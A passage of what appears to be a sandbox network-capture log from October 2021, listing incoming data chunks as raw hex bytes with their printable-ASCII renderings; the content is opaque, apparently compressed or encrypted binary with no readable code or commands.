                                                        2021-10-13 12:39:36 UTC155INData Raw: 9a fd ff ae cd 57 ea d7 12 d2 e0 49 e5 c5 5d 0c bb 85 e1 c8 23 fc a4 c1 57 21 42 b8 7f 6a 67 b2 c1 da bf db 5f 7d 55 84 0a 8b 18 c7 f7 c1 7f 59 d0 57 85 af db 74 c0 f3 21 31 6d f4 1e 0f 8b 2b 6c 59 6f 66 96 c6 cc 6b 4d 7a 18 07 1e c3 6b 50 5a 1a 97 c2 dc 09 29 38 94 b8 e3 36 ba 6d 4b 3c a7 e0 e2 a4 8b 20 b2 cd 2e 34 f5 9d 52 62 ff 81 5e 1c 2e f7 5e 6e 3b be ea 95 b1 a5 a8 83 a7 22 f4 cf f5 0c a7 96 f5 e3 d8 14 0d 83 4b 89 f9 4d b9 88 fe a1 e7 ff 5a 7e 0b 82 a3 8e f4 1a 6f a8 be f1 4a 1f d2 37 cb cc 98 c7 1e fb 1e 7f 12 f3 c6 6f 83 d9 f1 7f 6a 23 1c 39 27 e5 55 ae 64 48 af 2a d0 7e c6 4c e0 66 cb 5f d9 ae 15 01 70 20 2d 58 c5 0f e4 bd f3 35 97 01 6d ef 45 5c 2d b6 2b 42 0c ce 55 cd b4 e2 db 27 fe 9e 51 fe d9 d7 ad 85 5e 53 e8 7d 34 01 9f 56 73 d4 60 74 a3
                                                        Data Ascii: WI]#W!Bjg_}UYWt!1m+lYofkMzkPZ)86mK< .4Rb^.^n;"KMZ~oJ7oj#9'UdH*~Lf_p -X5mE\-+BU'Q^S}4Vs`t
                                                        2021-10-13 12:39:36 UTC156INData Raw: e1 45 1c 54 46 be 2c 8a 0f 20 64 ba b0 08 b2 5b 43 09 d6 5c e9 58 fa ce 9f b0 f9 7d 60 cf c8 2b d9 bb 5a f3 d4 25 00 0b ae b9 46 c3 29 2d 22 ae 8d 8c 6d f7 4e 91 d9 51 c9 9c aa 15 90 53 d5 e8 46 c8 7d 62 2d 69 9e 2f 0f b1 3a 0b f2 69 ef 2c 3d 86 c7 a8 b4 34 ac fb d7 5d a1 6a af 38 3d 06 05 eb 88 eb 1c 33 ef 39 1d 1b dc df ab 20 11 bc f7 a9 ce 63 14 fc ae 17 23 68 ad c1 60 72 f9 87 5b 38 12 df 3f 7c 5a 6d 92 77 3f 11 4e 65 df 21 31 e9 c4 4d 98 ab 6f bb 7e a9 3a 6e b6 46 9e 2a 9a 78 4e b5 ca 49 3d bf 1d 83 f4 d8 bc b3 c8 f1 da 4a 72 83 24 09 8f ec fb 63 c6 a8 4d 67 97 20 58 df 1d 12 5d d9 22 6a 5c fb d4 29 3f ac 03 82 9b b3 5a 1b 0d dc 72 09 e3 89 91 c4 e6 64 5e de 62 29 69 43 ae 8b fd 7a 63 3a 29 8d 76 80 de 8d fd 25 ae ef e4 bf ff 78 f4 f9 1e c0 e9 49 f0
                                                        Data Ascii: ETF, d[C\X}`+Z%F)-"mNQSF}b-i/:i,=4]j8=39 c#h`r[8?|Zmw?Ne!1Mo~:nF*xNI=Jr$cMg X]"j\)?Zrd^b)iCzc:)v%xI
                                                        2021-10-13 12:39:36 UTC157INData Raw: c6 a2 e8 dd 71 0d 63 f8 70 1c 13 39 cd 9b aa 86 c2 36 f6 1c 9d 9a 60 db e3 3e 60 7f b6 2a 14 42 7e 8f 5c 42 14 53 db df d8 8d b7 b4 82 da 25 9b 76 43 3f 1d 02 66 ae ed 99 1d 0e 69 af 56 02 91 ee 7a c1 a4 3a 10 88 55 de 7c 36 d3 15 7a 44 ca 29 3f a9 32 44 c1 93 80 9e b8 9b 4c 79 61 d6 55 1f ef 29 d9 ca 31 73 7a 6e e4 28 ab f7 41 ac e5 11 87 c4 75 ae ea 91 82 9f cd 7e 56 fd 8e db c8 e9 00 5e 07 76 e2 c3 3e a8 f0 b2 24 71 a2 db 38 ca 94 6d 91 86 8c bb 7e 60 a7 47 5e f7 b7 1e 26 b1 10 dd 36 1a 0c 26 6d bd 88 cc 00 d0 1b f2 cb 0c a8 e3 6e fb 65 70 7b 43 6f 3d 21 4e ea c7 9e 4f 2c 98 6f ec dd b5 77 0e 74 04 0f 96 6c 35 87 79 c6 91 90 7b d4 0c 5a c5 93 0e 7b ed 92 65 55 86 74 cb 28 48 fd 28 24 00 50 75 f5 13 8f 39 e2 d5 2c d3 57 29 70 7c a8 3e b5 3f 2e 70 ed a5
                                                        Data Ascii: qcp96`>`*B~\BS%vC?fiVz:U|6zD)?2DLyaU)1szn(Au~V^v>$q8m~`G^&6&mnep{Co=!NO,owtl5y{Z{eUt(H($Pu9,W)p|>?.p
                                                        2021-10-13 12:39:36 UTC159INData Raw: 83 11 88 5a 59 52 88 6b 5e f0 c5 93 05 36 7b 91 73 34 70 7b 57 90 d6 e5 55 61 75 45 27 03 b9 76 6b 32 37 b7 e9 f5 3f 23 2e 8c a7 b5 2a a7 7c 03 6e f3 a1 b1 ba 90 36 a9 de 50 5f 88 ed 3b 07 bd d7 1f 64 5f 96 32 6d 5d f5 ae c0 c7 db 8c ad 92 1d 99 cf d8 0c aa b3 c7 f0 f1 3e 3c b6 4f 83 cd 5c ae bb d0 b5 fd c8 6e 7f 44 82 93 b0 ed 34 76 88 b2 e6 4b e2 13 ca 0d 34 66 02 eb 06 e9 94 b5 2f 46 9e 09 52 77 e3 fb ae 91 a3 b1 7b 27 d4 6d 54 c9 55 d8 74 bc 3e 8d 1e a1 23 e8 f0 7f 7d 60 4b 3e 2e f7 07 cc 8a d8 0c a4 66 4b fb 0c 1c 77 8a 7d 6f 17 bc 30 f9 ce af 82 11 ff 93 65 c7 ea fe f2 a3 56 5c ae 46 04 2f eb 53 7d ef 26 2d ff 00 6e 7b 2a 02 79 69 4f de 45 c8 27 25 0e 4a be 22 2c 24 c8 05 ee a8 ee fc 4b ab 0b 62 9e a8 d0 70 b8 e2 84 24 27 a5 e2 8b 04 89 c0 ff d4 c6
                                                        Data Ascii: ZYRk^6{s4p{WUauE'vk27?#.*|n6P_;d_2m]><O\nD4vK4f/FRw{'mTUt>#}`K>.fKw}o0eV\F/S}&-n{*yiOE'%J",$Kbp$'
                                                        2021-10-13 12:39:36 UTC160INData Raw: c2 8c c7 35 f2 79 8a d4 46 b1 84 9d 6e b6 78 f8 dc 78 e4 17 7c 2a 71 a6 23 1b ac 1b 34 8f 73 c6 09 73 ec a2 cb df 4f d1 d6 93 18 de 07 d2 54 5d 78 71 e9 d9 ae 4d 21 b5 57 59 3d 9e c5 f0 06 61 d3 ea 82 f0 4a 68 e0 9d 61 57 7a bb ae 47 49 bc f2 4d 59 14 a5 57 5e 09 2f b6 43 22 e1 b0 88 2d c7 df 02 2e b7 67 62 fb 02 c4 50 c3 c1 40 a2 7f c4 4a d2 f1 11 8c 0f 7c fc 5d db b0 a6 dc 8d f9 9d ed 77 47 a2 1c 62 d3 81 8b 05 a6 c0 25 1c 8f 0e 7d dd 26 20 4d 96 4f 33 1f ae 96 4d 52 c0 3e c9 e3 e4 26 6e 74 e8 1a 6c 9a f2 e2 f8 ec 1b 3c b9 1b 1a 0e 08 b1 8d f8 65 79 6c 31 ad 02 f4 ac be c9 0c e6 99 d8 96 c6 43 81 a1 78 e2 d2 65 c8 ac 40 2f 97 a7 e3 f9 52 f7 84 f8 66 fd 96 76 d1 c7 bc 4e 2d 2d 40 21 b8 d9 b9 7f f2 28 b5 73 38 72 d4 bf 66 fd 40 15 61 9f 73 43 d2 f7 b2 22
                                                        Data Ascii: 5yFnxx|*q#4ssOT]xqM!WY=aJhaWzGIMYW^/C"-.gbP@J|]wGb%}& MO3MR>&ntl<eyl1Cxe@/RfvN--@!(s8rf@asC"
                                                        2021-10-13 12:39:36 UTC161INData Raw: ca 6e 5a 2e 6c 26 5e 9a a5 d5 28 31 03 d9 6f 78 aa dc 5b b3 85 07 7d f0 21 a5 4e 1e ea 43 3d 16 d5 23 4c b8 15 3d bb e5 90 d3 cc eb 2e 57 4b d2 54 49 a5 23 d9 e3 00 59 1a 07 8a 70 b4 c9 4b b7 f0 08 b6 c6 99 52 34 4e 6d 6d 24 88 f8 28 74 05 09 30 f6 b2 de af 3f 23 fd 52 0c 5c f3 5c 97 e4 38 c9 89 2a f1 b9 a3 84 55 24 e7 6b 39 95 9a 63 59 88 3a d9 6d 24 7f 58 4d 99 85 ee 78 c5 06 bb c1 2d f8 b2 46 9c 35 4c 2a 06 10 4a 45 2b d9 93 b1 79 0c d0 07 95 a0 d8 38 73 2c 3a 3a f2 24 1e bf 3f 92 c2 bb 5c f3 32 2f ec b0 34 47 c1 83 46 4f 8e 64 e7 0e 72 dd 40 59 20 11 6e b2 78 b0 40 99 f2 49 97 a1 9c d1 e4 52 96 62 d3 90 cf 0a 56 b6 0b ec e1 90 63 b4 09 f7 11 49 3e 02 40 cf de 7a 24 dd 50 58 b6 68 e8 5c 6f 63 f1 ff 77 f0 67 13 1c 99 c2 e3 12 85 2b e9 a3 25 ab ed ac 77
                                                        Data Ascii: nZ.l&^(1ox[}!NC=#L=.WKTI#YpKR4Nmm$(t0?#R\\8*U$k9cY:m$XMx-F5L*JE+y8s,::$?\2/4GFOdr@Y nx@IRbVcI>@z$PXh\ocwg+%w
                                                        2021-10-13 12:39:36 UTC162INData Raw: f0 c1 ed ca 99 a5 cb 40 dc 38 be af 19 d6 d2 45 11 58 94 0f 31 21 6f aa 61 0a 7f 22 ec c2 f0 b6 96 b6 9f c1 1c ab 0a 6a 71 79 31 5b 96 8f ea 65 27 76 9f 3d 65 e5 95 1f a5 d5 5c 33 9b 77 ac 1e 4b 96 05 7b 71 ff 7c 28 8b 18 4e ea b6 9b 85 87 f6 5d 50 7a cf 52 0b fe 14 bc cc 10 4c 14 54 a1 5b bc c3 7f 5b 0b ea 7d 3c 86 70 37 4c 73 79 2f 82 e6 21 6b 3e 2b 04 c8 a9 d0 a8 1c 20 d4 59 0c 62 bc 7e 83 d9 19 f0 b9 55 b4 a6 d1 c5 0f 72 ae 72 63 c8 9c 06 13 9d 35 c6 08 20 22 0b 67 d7 84 e4 22 d4 4e be bc 5f 88 81 39 99 0e 42 08 20 1e 5e 51 2c 95 fa ab 7b 03 c5 2d 92 a3 cf 0f 74 02 1b 3e a8 75 13 a7 14 ae fd 88 5d f8 25 6d d1 bb 2e 44 d2 84 67 69 9d 76 fc 38 72 d9 11 10 20 5e 43 eb 3c b1 e6 37 1a eb 39 b5 cb 82 ac 16 de 7f de ca 90 5c 43 fc 67 a5 ab c2 28 be 14 81 09
                                                        Data Ascii: @8EX1!oa"jqy1[e'v=e\3wK{q|(N]PzRLT[[}<p7Lsy/!k>+ Yb~Urrc5 "g"N_9B ^Q,{-t>u]%m.Dgiv8r ^C<79\Cg(
                                                        2021-10-13 12:39:36 UTC163INData Raw: 2e c6 55 55 91 c2 ce 39 12 2f 80 e8 d0 84 2f 0a 74 1c 3a 63 9f 27 09 46 0b f6 9a 9c 73 61 36 f4 ed 88 b0 cf 54 52 09 8b f5 e2 c8 85 0c 90 ac 64 1d a4 ff 3d 15 96 8f 3f 6a 55 46 38 16 5c c8 88 7f f3 b7 9e 89 a6 4a b0 af cb 13 a4 5a c8 a6 e2 12 05 68 4f 09 f3 40 a8 5c e6 cb f3 f9 4f 4e 7d eb b2 89 df d9 4b 36 8d dd 68 3d f5 81 e6 e8 ac 53 3a 44 2c 5c 78 29 9d b1 cf a3 93 1c 08 5c 57 48 42 42 ef 2f a4 b5 2c 07 14 ac 7c d0 73 7f 6f d4 12 21 99 ab a6 b5 fd d4 2e cf 27 d2 36 f5 52 2e 94 87 b6 a4 d7 06 8a 3b f5 25 b2 e4 6a dc 11 87 4e 11 e2 b4 71 fa 70 ef f2 fa 38 d9 94 66 5c ac e6 72 a7 a9 59 dc c6 ca ab dd f1 35 f2 46 f8 fc 9d 2d b6 f1 5f 72 aa 7d 40 ba 69 0f 53 ab d1 10 bf 52 01 ad 7a c9 03 47 23 e0 7f f9 bf b8 5d 71 a4 af 98 19 92 8a df 86 25 b7 40 64 cc 26
                                                        Data Ascii: .UU9//t:c'Fsa6TRd=?jUF8\JZhO@\ON}K6h=S:D,\x)\WHBB/,|so!.'6R.;%jNqp8f\rY5F-_r}@iSRzG#]q%@d&
                                                        2021-10-13 12:39:36 UTC164INData Raw: 1e f5 06 c6 1f 84 0a 04 fa 2e 3b 4a 0e d0 3a 79 d5 59 75 d0 8f 9d 33 4d f0 a6 df dd a8 d7 90 bd 0f cf bf db 36 40 70 2f d4 c7 5e 4e 22 b7 74 48 85 9f 6f e6 1c 5b f4 d3 b2 ca 6d 0b e0 b0 e6 75 cd 91 93 68 31 a4 2b 67 60 3a 99 58 ac 39 8c 81 40 17 28 78 d8 f0 07 04 f9 eb ab ab 22 75 85 40 81 15 0a 8e 74 a7 6e 92 83 76 0f 16 9a e6 75 c3 89 2a 06 75 0c 13 b1 11 02 a4 50 fb c0 68 74 27 af 09 78 97 71 46 6c 8a 35 da c6 bb b1 96 cb fc ce 72 1e dc cc f6 64 6f 6f ae eb e3 34 9a e5 0f a0 7e af 2a 85 ac 24 90 f9 d8 89 36 12 60 2a e9 31 f9 ea ba 48 17 62 6b a7 15 67 7f e0 73 7a 79 5b 92 5c 68 82 67 4c cc 8f 2c c3 42 df a2 61 21 43 c4 01 db 2c d8 d9 f0 d2 6e cb 07 76 ed df e6 fd ac 23 ae 7b 72 8f c6 58 7a e8 2f 43 39 3e 22 13 b8 8b dc bd 55 bd f1 74 22 14 2f e2 f1 a9
                                                        Data Ascii: .;J:yYu3M6@p/^N"tHo[muh1+g`:X9@(x"u@tnvu*uPht'xqFl5rdoo4~*$6`*1Hbkgszy[\hgL,Ba!C,nv#{rXz/C9>"Ut"/
                                                        2021-10-13 12:39:36 UTC166INData Raw: e0 6e 42 8b 2c 7b 3f 82 59 b0 ca 4c 39 94 7b ba 0b 51 11 27 6d 5c c6 79 d7 af 28 43 ca 9d 60 b3 a1 9c 5a 77 70 f8 df 20 d2 39 b1 db 84 6a 2a 2a 17 70 29 e6 6a 92 9c 04 ac fe 5c 9f 51 ad 44 ad e8 51 7a cf 48 f0 fe d2 4e 5d f4 65 e3 fe 0b 87 de a2 24 8b 0b 3c 5e 10 5f af 7b 09 0d 37 ee 9a 4b 8d 9e 20 7f cf df 40 cc 3f db dd aa f3 1f 36 7d 17 71 28 5e 04 37 de ee 5d 33 09 8b cc 79 8e 8b c8 d2 bb f9 11 29 ef 9d 54 4c 22 2d 50 88 ea 11 8d b6 30 e7 b0 94 a4 05 50 32 f8 a0 84 95 72 18 8b 1d 6a 3f cb fd 24 a7 6a ab cf 66 ac 3f 96 f6 d4 52 86 54 91 68 45 b1 76 3e 9b cd e2 1f 8b 1a 83 92 d8 19 14 01 11 ec f4 93 61 5a 73 ba 54 46 33 29 5f d9 dc 78 25 b3 29 1e d1 0d 82 43 03 08 de ef b6 57 57 76 35 fb 77 dd 3c ee 1d 8f 04 c8 97 84 e9 50 46 48 83 ff 1a 96 29 43 4d 1d
                                                        Data Ascii: nB,{?YL9{Q'm\y(C`Zwp 9j**p)j\QDQzHN]e$<^_{7K @?6}q(^7]3y)TL"-P0P2rj?$jf?RThEv>aZsTF3)_x%)CWWv5w<PFH)CM
                                                        2021-10-13 12:39:36 UTC167INData Raw: 53 7f 91 f9 aa 14 80 c6 0a 6c c2 82 6b 74 69 ce 1f e2 b2 fe ac 8f 31 24 a9 e6 f9 15 33 a8 eb ef d0 14 92 82 26 b3 e8 46 bc 9d f4 82 c1 ff 8b 7c 4e b3 b0 8f 48 0c 93 a7 91 d7 7c 26 96 17 e7 e2 e6 ca 20 d2 2a 56 ef ed e3 5b f8 b1 04 19 5c 40 7a 5c 3f 9b d8 33 d9 27 bb bc 16 bd 07 42 67 f6 74 e6 6f b3 5d 8e a6 87 80 52 64 dc 10 46 7a 73 a4 97 a2 13 fa 22 1c 5d ad af b9 b7 da 7f 5f 0c 4f 15 b7 2b da 64 2f f9 ed 20 c7 d6 6e 5f a1 a9 60 df 80 f4 6e ab 53 bb a3 5c d6 b3 e8 e8 8c c0 0b 69 a5 b9 fa 67 be b7 aa a0 3e 2c 74 35 70 76 ff 10 c2 da 02 17 36 4f 94 6b 4b 74 33 7f ab d7 0c e5 e8 29 5c 95 d8 d6 94 00 6f bc 14 f0 80 b5 62 b0 61 54 7c 7e b5 5f 52 0f 89 8c 29 18 09 b7 ca 01 37 e5 a4 cb bb 13 39 17 8e 43 73 3e ce 80 b0 fc 71 6f 46 8e 0f 79 fd 83 d6 b3 f9 4e 3b
                                                        Data Ascii: Slkti1$3&F|NH|& *V[\@z\?3'Bgto]RdFzs"]_O+d/ n_`nS\ig>,t5pv6OkKt3)\obaT|~_R)79Cs>qoFyN;
                                                        2021-10-13 12:39:36 UTC168INData Raw: 5c 28 e2 fa 61 1e 51 f4 cf f6 c9 6d 0b e9 a4 53 e2 4d 1a 99 63 31 10 96 71 60 3a 84 4e 6a fd 0c 8a 48 1d 28 24 15 f1 07 04 80 ff 66 3c ad a0 86 4a 81 91 43 89 74 a7 17 81 4c e1 80 97 93 eb 75 c3 4d 2b 06 f5 75 00 40 e2 8e 42 5a f7 c0 68 25 24 af 89 65 86 86 d1 e3 60 3f d6 c6 bb 26 97 cb 7c 5f 60 e9 4b 5d 03 6e 63 6b ae ff e4 34 1a f8 1e 57 e9 3d d2 8f a0 24 90 d8 cf 89 b6 0f 71 dd 7e a7 07 40 b6 48 17 19 68 a7 95 67 69 17 e4 e5 7d 50 9e 5c 68 c9 70 4c 4c 92 3a 34 d5 41 b7 6a 2f 43 c4 a4 d8 2c 58 c4 e6 2d f9 78 18 7a fd df e6 36 bb 23 2e 66 64 4c 51 ed 5e e4 3f 43 39 d1 21 13 38 96 ca 73 c2 05 da 7f 33 14 07 71 e8 a9 83 29 1b 31 08 76 91 91 36 0c 56 20 c5 9c 9c 43 78 7d 26 fe 6e 6a c4 1f dd 6f 8b c7 c0 83 a7 0a 8d 93 8a 54 86 f9 4d 74 93 c4 0c 6c 44 83 c6
                                                        Data Ascii: \(aQmSMc1q`:NjH($f<JCtLuM+u@BZh%$e`?&|_`K]nck4W=$q~@Hhgi}P\hpLL:4Aj/C,X-xz6#.fdLQ^?C9!8s3q)1v6V Cx}&njoTMtlD
                                                        2021-10-13 12:39:36 UTC169INData Raw: 6f 98 7f 82 de 6b 92 c3 2d a1 7c 5d 0e d5 17 b7 e6 e6 74 33 e4 ba ed ff 52 3c e7 26 ef e3 a1 01 a9 d3 a0 25 8b 55 b0 fd 9c 7e 38 49 63 12 10 ef 94 de 82 8d 02 7e d9 e3 fd dd 51 d5 f8 d6 d0 2f 2b 7c 37 db 22 fd 0d 31 b2 02 64 9b 28 12 cc aa 84 9b dc db 2c 02 49 36 c8 9c 07 0b 0d 3d 72 89 fc 8f ba a1 40 e9 95 0b c5 8d 52 33 f8 5a 88 85 e7 18 04 e3 46 2f f9 66 24 c2 47 a6 cb 67 3b b7 8d fb f3 53 32 98 a5 7b 47 b0 32 ec a9 d4 f3 1e ae 2d 9d 9f da 18 17 a2 18 e7 b3 b7 90 ef 77 f1 56 47 33 00 40 c9 98 7a 41 d3 e6 38 ea 0b 84 3e 05 1b df b9 70 c3 0c 2e 0f a2 d2 c9 3b bd 03 d9 87 0c d0 d4 9e 0d 08 0d a1 ac 04 90 2f 3e 48 0e d6 5f 28 f0 a8 6a f5 28 9d 42 4c f2 a5 df 9b 58 b1 9b 7c 1d ea 18 db 42 41 72 2d d4 81 bc 01 29 93 72 6f 28 9f ee e7 1e 59 f4 95 ac a0 66 c5
                                                        Data Ascii: ok-|]t3R<&%U~8Ic~Q/+|7"1d(,I6=r@R3ZF/f$Gg;S2{G2-wVG3@zA8>p.;/>H_(j(BLX|BAr-)ro(Yf
                                                        2021-10-13 12:39:36 UTC171INData Raw: 73 51 9b b6 2b 24 0d 4b 8e 97 c4 68 ff ed 16 f3 c8 ac 15 ce d0 2b 56 78 ff a9 ba ee 6a 91 32 17 9e 82 5a 42 9d cb 22 8f dd 29 be 2c bb 51 72 73 f0 5c ca 39 20 99 87 bf a8 c4 f8 2e 07 39 6b 2c f3 52 85 8a 57 ae 79 d5 70 85 cb ea 36 b2 7d 77 33 19 6c 47 08 f9 62 79 59 74 23 ef fa 38 cc 94 a9 4f 24 d2 5e a7 d9 7d 96 f5 dc ab b4 c0 00 db 97 fc 41 8d 85 ab e6 5f a2 82 9f 68 1e 6c 35 4a 70 f9 12 b4 dd 11 15 60 dc 03 58 3c 5b 77 d5 bf 28 58 c8 be a9 98 87 9e 6d c3 54 2d 91 52 94 c3 34 94 b1 27 6b 2a 69 7f e5 10 09 df 9c 54 1b 4f 9b 9c 92 ce a6 e5 b4 a7 39 ae de 38 5f 75 3e 59 92 82 13 72 6c 40 a3 3d d3 ec 82 12 b2 cb 5f 3d 3b 69 63 08 7b b5 b0 66 5f c7 79 00 bf 3b 0b cc 37 a7 81 b2 ae 41 76 5c fa 7c 2e d3 0c d9 06 2e 5d 2b 9a a7 6d 82 fb 6b 81 c3 e4 a3 1c 47 b5
                                                        Data Ascii: sQ+$Kh+Vxj2ZB"),Qrs\9 .9k,RWyp6}w3lGbyYt#8O$^}A_hl5Jp`X<[w(XmT-R4'k*iTO98_u>Yrl@=_=;ic{f_y;7Av\|..]+mkG
                                                        2021-10-13 12:39:36 UTC172INData Raw: c7 41 e5 56 1f 89 74 a7 11 98 c6 55 c8 16 db e7 ed 80 4c 2b 06 75 73 19 f3 32 4c a5 18 fb 61 2b 24 24 af 09 63 8f e3 63 f1 8b 7c da 76 f8 27 97 cb fc 59 79 45 d1 15 f6 2d 6f 8f ed fe e4 34 9a fe 07 eb 73 fc 2b cc ac d4 d3 d9 cf 89 36 09 68 17 e4 ef f9 04 ba 6c 53 18 68 a7 15 61 77 c0 7e 24 78 15 92 6c 2c c8 70 4c cc 94 24 f5 4b 09 a2 2e 21 27 80 a5 d8 2c d8 c2 f8 e3 67 b9 06 3e ed af a2 37 bb 23 ae 60 7a 3c eb aa 7f a3 2f e7 7d d0 21 13 b8 90 d4 31 78 fa f1 38 23 a4 6b 2f e8 a9 83 2f 02 4b 14 37 54 d6 27 e8 02 41 c5 9c 9c 45 61 fb cf 15 89 27 d5 ef 25 0e 8b c7 c0 85 be 4c a4 be 6d 06 97 dd 78 14 93 c4 0c 6a 5d d0 16 c5 6c 9e 88 d3 bc fd ad 8f a6 23 b2 5b ed 53 a0 f8 d2 89 94 15 05 83 6d b7 e1 8b bd 64 e6 d1 c0 8f 0a 7c 5d b1 b6 89 d7 17 55 c8 93 85 68 85
                                                        Data Ascii: AVtUL+us2La+$$cc|v'YyE-o4s+6hlShaw~$xl,pL$K.!',g>7#`z</}!1x8#k//K7T'AEa'%Lmxj]l#[Smd|]Uh
                                                        2021-10-13 12:39:36 UTC173INData Raw: 1f e5 47 82 8d 22 6f cf 7c 6b 7b 1f b2 dd c2 71 b6 2b 7c 17 ca 34 62 18 e8 fc 63 41 ff 92 8b cc aa a4 8a ca 44 ba e9 19 49 ed 34 d2 92 0d 3d 52 98 ea 10 af 54 10 96 b0 ef 2f 14 52 33 f8 4b 89 12 71 3d a8 9d 63 35 4e fd 24 c2 47 a0 cd 73 ab a5 9e 8a d6 6b 01 03 a5 7b 47 b6 6e ab ab f6 c3 6f 8b a1 1a 9e da 18 14 a4 06 ba d3 ae 42 9c 52 11 d1 46 33 00 43 c8 c6 3c 00 bb 04 46 cf b3 0c 3f 05 1b dc b8 36 57 57 36 2b dc f7 6d b1 bc 03 d9 84 0d 96 c3 f0 15 c6 73 84 14 8f 91 2f 3e 4b 1f d0 d0 6c 5c 7a 19 d0 24 11 43 4c f2 a6 c9 dd cc d4 39 9e 63 cf ac f9 42 41 72 2e d2 df fa 7e 31 b7 0c 4a dc 13 ef e7 1e 5a 92 d0 38 c8 fe 2a 98 b2 1f f8 4d 90 91 68 37 bc 8a 54 73 3a f5 58 ed b4 0c 80 4b 16 4e 7b 21 e1 14 04 f1 e9 f0 26 ad 74 8e 41 c5 16 89 88 8a a6 66 90 e8 fb 80
                                                        Data Ascii: G"o|k{q+|4bcADI4=RT/R3Kq=c5N$Gsk{GnoBRF3C<F?6WW6+ms/>Kl\z$CL9cBAr.~1JZ8*Mh7Ts:XKN{!&tAf
                                                        2021-10-13 12:39:36 UTC175INData Raw: 72 f1 5c ca 3f 33 0e 8e d2 81 ab d2 aa 06 39 6a 2c f3 54 96 9e 38 f0 88 aa 5a 7d 5e ee 37 b2 7d 71 20 8e 94 9c 26 8f 48 4d a7 73 22 ef fa 3e df 80 ba 9a f7 ab 74 ca 77 7a 97 f5 dc ba bf 8b e1 5c 40 85 6b 39 b7 ac e7 5f a2 84 94 2d 89 7a 36 25 5a 85 c8 be dc 11 15 76 cf 94 6b 27 53 18 ff 8f 0f 4b c9 be a9 8e 94 09 fb 15 84 58 bb ae 03 d7 35 94 b1 31 78 bd ff 06 53 69 23 87 ec 40 1a 4f 9b 8a 81 da eb ec eb c0 13 32 f6 2c 5e 75 3e 4f 81 96 f9 0f 64 2f 89 d9 9b fa 83 12 b2 da 4c aa a5 d5 92 77 51 7d e9 7f 5e c7 79 11 ac ac 40 15 b7 c0 ab c2 7c 5a 77 5c fa 6a 3d c7 3e e7 d6 51 77 d7 c1 bc 6c 82 fb 7d 92 07 2c 3f ec 20 9f 49 6c b7 b0 e9 51 25 e4 2d ec 6e f9 41 76 46 89 e3 fe 0e 8c c5 a0 31 8c c4 1b 80 0d ea 8d 48 04 1d 35 e9 82 03 a7 9e 22 03 cf 57 99 dd 3d da
                                                        Data Ascii: r\?39j,T8Z}^7}q &HMs">twz\@k9_-z6%Zvk'SKX51xSi#@O2,^u>Od/LwQ}^y@|Zw\j=>Qwl},? IlQ%-nAvF1H5"W=
                                                        2021-10-13 12:39:36 UTC176INData Raw: 97 cb 6a 5f 91 c8 3a 5e 8a 66 eb 69 ac ff e4 34 0c f8 6e 70 98 3e 56 87 33 26 92 d8 cf 89 a0 0f 32 ff 0f a4 85 48 00 4a 15 19 68 a7 83 67 5c 3f 95 e6 05 59 47 5e 6a c9 70 4c 5a 92 a5 16 a4 42 de 63 d1 41 c6 a4 d8 2c 4e c4 e0 07 88 7b 7b 73 e6 dc e4 36 bb 23 38 66 c4 6e 20 ee 06 ed 08 40 3b d1 21 13 2e 96 b6 47 b3 06 8d 76 61 17 2d 2e e8 a9 15 29 ea 33 fa 73 2d 99 7a 0f 44 40 c5 9c 0a 43 fd 69 21 e9 f5 68 ad 1c 63 0f 8b c7 56 83 bc 09 76 92 11 56 03 fa 3f 15 93 c4 9a 6c ad 96 c4 5f 12 ce 38 e0 fb fc ad 8f 30 25 84 e7 1e 17 d9 a9 1e ee d3 14 05 83 fb b1 12 50 4e 98 9a 80 28 fc 4d 7d 5d b1 20 8f b7 0e ad 8c ea d7 6b 25 df 15 e1 e2 3a cd 0b c7 cd 54 05 ec b7 75 eb b1 93 18 81 42 ee 59 a4 9f b6 31 b5 a3 2e bd 3e 91 c7 c2 11 e6 ba c8 44 33 cc 8b 8c ab d6 d2 b8
                                                        Data Ascii: j_:^fi4np>V3&2HJhg\?YG^jpLZBcA,N{{s6#8fn @;!.Gva-.)3s-zD@Ci!hcVvV?l_80%PN(M}] k%:TuBY1.>D3
                                                        2021-10-13 12:39:36 UTC177INData Raw: c4 89 de b6 48 a4 4f e6 be 06 ab 15 52 33 6e 5a 66 80 96 1b f6 ec 4c 22 cb fc 24 c2 d1 a6 57 56 4a b4 e3 fb 86 5e 84 02 a5 7b d1 b0 6f e8 68 c2 9d 1e fa 20 9f 9f da 18 82 a2 4e cd 10 90 1c ed c0 fc 54 47 33 00 d5 c9 9d 7f c3 da 5a 37 7c 06 86 3e 05 1b 4a b9 da f4 b0 27 56 ad 22 c4 39 bd 03 d9 12 0c c8 d6 11 04 bb 02 73 a1 06 90 2f 3e dd 0e 6a 41 8b d7 24 68 c9 26 9f 42 4c f2 30 df 6c 5a 33 92 c0 12 f4 16 d9 42 41 72 b8 d4 e9 b8 bd 20 ca 7d 16 26 9d ee e7 1e cc f4 30 ae 2f 6f 76 e9 cc 5d 77 4c 90 91 fe 31 c0 c8 97 62 47 84 f8 64 3b 0d 80 4b 80 28 2d 4d 17 05 79 80 2b 68 a9 ac 74 8e d7 81 33 16 6f 76 da 17 73 42 74 81 17 91 71 75 4f 4f cd 04 08 75 15 6f 13 8c a5 52 6d c0 7b 2f c2 ad 74 65 b1 a9 44 e2 8b 37 4c c6 02 24 71 c9 81 5f 39 c6 de 5c f7 66 f9 6b c3
                                                        Data Ascii: HOR3nZfL"$WVJ^{oh NTG3Z7|>J'V"9s/>jA$h&BL0lZ3BAr }&0/ov]wL1bGd;K(-My+ht3ovsBtquOOuoRm{/teD7L$q_9\fk
                                                        2021-10-13 12:39:36 UTC178INData Raw: 00 2e d8 dd d6 f5 21 2b 7b 11 3d 36 88 19 c8 cd 0f 41 9b 14 1c cc 8b 96 7d c8 ae bb 23 2f 3b ed 9c 54 05 0d 0c 54 6f e8 fa ae e4 26 e4 b0 0b a9 83 52 a8 ca bc 8b f8 70 7d 9f ee 63 2f c9 6a 24 99 41 40 cf 1a ac 30 8a f9 d6 53 86 94 a5 7f 72 56 74 93 8e 68 f4 1c 8b 2d 9d 09 da 51 15 44 1c 82 f6 58 75 ef 52 f1 56 d1 33 88 45 2f dc 04 25 34 33 35 cf 0b 84 a8 05 87 dd 5f 34 bd 56 2b 3e af f7 c9 3b 2b 03 c0 83 ea 94 aa f7 36 d3 00 84 ac 04 06 2f f0 4a e8 d2 3a 6d 87 4c 6a d0 28 9d d4 4c bd a1 39 df 26 d5 e4 a8 10 cf 18 db d4 41 89 2f 32 c5 c2 5b b4 a2 7f 4a 28 9f 78 e7 ce 5d 12 d1 d2 c9 d5 1e eb b2 53 75 da 90 e6 